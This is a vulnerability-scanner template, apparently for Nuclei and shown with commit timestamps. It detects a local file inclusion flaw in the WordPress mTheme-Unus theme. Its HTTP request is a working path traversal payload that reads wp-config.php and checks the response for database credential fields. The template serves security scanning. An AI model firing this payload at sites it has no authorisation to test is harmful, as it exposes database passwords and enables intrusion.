2022-02-22 08:21:29 +00:00
|
|
|
id: mthemeunus-lfi
|
2022-02-19 11:01:43 +00:00
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: WordPress mTheme-Unus Theme - Local File Inclusion
|
2022-02-19 11:01:43 +00:00
|
|
|
author: dhiyaneshDk
|
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: WordPress mTheme-Unus Theme is vulnerable to local file inclusion via css.php.
|
2022-02-19 11:01:43 +00:00
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb
|
|
|
|
- https://packetstormsecurity.com/files/133778/
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: wpscan,packetstorm,wordpress,wp-theme,lfi,mtheme
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2022-02-19 11:01:43 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-02-19 11:01:43 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "DB_NAME"
|
|
|
|
- "DB_PASSWORD"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|